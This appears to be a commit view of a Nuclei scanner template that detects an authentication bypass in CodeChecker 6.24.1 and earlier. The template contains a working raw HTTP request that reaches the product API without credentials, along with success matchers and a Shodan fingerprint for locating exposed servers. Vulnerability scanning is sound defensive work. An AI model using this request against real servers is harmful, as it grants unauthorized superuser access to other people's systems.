Merge pull request #11186 from projectdiscovery/CVE-2024-10081
Create CVE-2024-10081.yaml (CodeChecker <= 6.24.1 Authentication Bypass)patch-14
commit
db9c0c8e0b
|
@ -0,0 +1,40 @@
|
||||||
|
id: CVE-2024-10081
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: CodeChecker <= 6.24.1 - Authentication Bypass
|
||||||
|
author: iamnoooob,rootxharsh,pdresearch
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
Authentication bypass occurs when the API URL ends with Authentication, Configuration or ServerInfo. This bypass allows superuser access to all API endpoints other than Authentication. These endpoints include the ability to add, edit, and remove products, among others.
|
||||||
|
reference:
|
||||||
|
- https://github.com/advisories/GHSA-f3f8-vx3w-hp5q
|
||||||
|
- https://github.com/Ericsson/codechecker/security/advisories/GHSA-f3f8-vx3w-hp5q
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2024-10081
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N
|
||||||
|
cvss-score: 10
|
||||||
|
cve-id: CVE-2024-10081
|
||||||
|
cwe-id: CWE-288
|
||||||
|
epss-score: 0.00043
|
||||||
|
epss-percentile: 0.09989
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
max-request: 1
|
||||||
|
shodan-query: http.favicon.hash:-1496590341
|
||||||
|
tags: cve,cve2024,code-checker,auth-bypass
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /v6.58/Products/Authentication HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
[1,"getProducts",1,1,{}]
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'contains(body,"{\"0\":{\"lst\":[\"rec\",")'
|
||||||
|
- "!contains(body,'Error code 401: Unauthorized')"
|
||||||
|
- "contains(header,'application/x-thrift')"
|
||||||
|
condition: and
|
Loading…
Reference in New Issue